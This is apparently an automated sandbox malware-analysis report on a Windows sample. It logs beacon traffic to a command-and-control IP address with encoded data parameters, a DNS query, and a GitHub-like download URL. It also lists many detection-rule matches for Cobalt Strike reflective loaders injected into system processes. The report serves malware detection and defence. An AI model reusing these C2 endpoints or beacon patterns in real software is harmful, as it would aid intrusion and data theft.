                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82*Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZs*drjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PX*FHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficDNS traffic detected: DNS query: api.5566331.com
                      Source: raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218
                      Source: fontview.exe, 00000006.00000002.3293216939.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=17358
                      Source: resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=17358
                      Source: BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A99000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=17358
                      Source: raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=17358
                      Source: control.exe, 00000003.00000002.3293163076.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=
                      Source: fontview.exe, 00000006.00000002.3293216939.0000000000BB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=
                      Source: resmon.exe, 00000008.00000002.3293228985.0000000002888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=
                      Source: BackgroundTransferHost.exe, 00000009.00000003.3183748550.0000000002AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=
                      Source: control.exe, 00000003.00000002.3293163076.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000006.00000002.3293216939.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.76.199.218om
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000002.00000002.3292960857.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: 1731043030539.exeString found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
                      Source: 1731043030539.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
                      Source: 1731043030539.exeString found in binary or memory: http://pki-ocsp.symauth.com0
                      Source: explorer.exe, 00000002.00000000.2044223303.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3298493696.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3299027484.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: explorer.exe, 00000002.00000000.2051006700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3305053857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                      Source: explorer.exe, 00000002.00000000.2039818389.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: explorer.exe, 00000002.00000003.3094503764.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000002.00000000.2039818389.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3297386884.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000002.00000002.3295607778.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038249716.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                      Source: explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: control.exe, fontview.exe, resmon.exe, BackgroundTransferHost.exe, raserver.exeString found in binary or memory: https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cpp
                      Source: explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: explorer.exe, 00000002.00000002.3305053857.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2051006700.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                      Source: explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

                      System Summary

                      barindex
                      Source: 1731043030539.exe, type: SAMPLEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.3.svchost.exe.1ad89460818.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.2.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.0.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b7f0000.6.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b720000.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b650000.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.3.svchost.exe.1ad89460818.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 3.3.control.exe.b107f8.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 10.3.raserver.exe.2ac07f8.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b170000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 8.3.resmon.exe.23007f8.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 9.2.BackgroundTransferHost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 6.3.fontview.exe.8207f8.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 3.2.control.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 6.2.fontview.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1800280b0.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 10.2.raserver.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.3.svchost.exe.1ad894834c8.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 8.2.resmon.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 1.2.svchost.exe.1ad8b580000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001060E __EH_prolog,CreateProcessAsUserA,CloseHandle,GetLastError,3_2_1001060E
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E53411CB0_2_00007FF6E53411CB
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD894705601_3_000001AD89470560
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD894769DD1_3_000001AD894769DD
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD8946A42C1_3_000001AD8946A42C
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD89476F701_3_000001AD89476F70
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD8947E31B1_3_000001AD8947E31B
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD894600001_3_000001AD89460000
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD8946B3A81_3_000001AD8946B3A8
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD8946B6881_3_000001AD8946B688
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD89462E881_3_000001AD89462E88
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800032701_2_0000000180003270
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_000000018000A8141_2_000000018000A814
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800100401_2_0000000180010040
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800109481_2_0000000180010948
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180012DB81_2_0000000180012DB8
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_000000018000BA701_2_000000018000BA70
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800057301_2_0000000180005730
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_000000018000B7901_2_000000018000B790
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD894653481_3_000001AD89465348
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B1023D3_3_00B1023D
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1000B13E3_2_1000B13E
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_100011833_2_10001183
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_100133723_2_10013372
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1003A3D43_2_1003A3D4
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1003942A3_2_1003942A
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_100426563_2_10042656
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1003A8093_2_1003A809
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10033A503_2_10033A50
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10039AC83_2_10039AC8
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10004B5B3_2_10004B5B
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10013B813_2_10013B81
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10001B943_2_10001B94
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10003BFD3_2_10003BFD
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1003AC3E3_2_1003AC3E
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10003CEA3_2_10003CEA
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10012D833_2_10012D83
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10039FBC3_2_10039FBC
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_3_0082023D6_3_0082023D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1000B13E6_2_1000B13E
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_100011836_2_10001183
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_100133726_2_10013372
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1003A3D46_2_1003A3D4
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1003942A6_2_1003942A
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_100426566_2_10042656
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1003A8096_2_1003A809
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10033A506_2_10033A50
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10039AC86_2_10039AC8
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10004B5B6_2_10004B5B
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10013B816_2_10013B81
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10001B946_2_10001B94
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10003BFD6_2_10003BFD
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1003AC3E6_2_1003AC3E
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10003CEA6_2_10003CEA
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10012D836_2_10012D83
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10039FBC6_2_10039FBC
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_3_0230023D8_3_0230023D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1000B13E8_2_1000B13E
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_100011838_2_10001183
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_100133728_2_10013372
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1003A3D48_2_1003A3D4
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1003942A8_2_1003942A
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_100426568_2_10042656
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1003A8098_2_1003A809
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10033A508_2_10033A50
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10039AC88_2_10039AC8
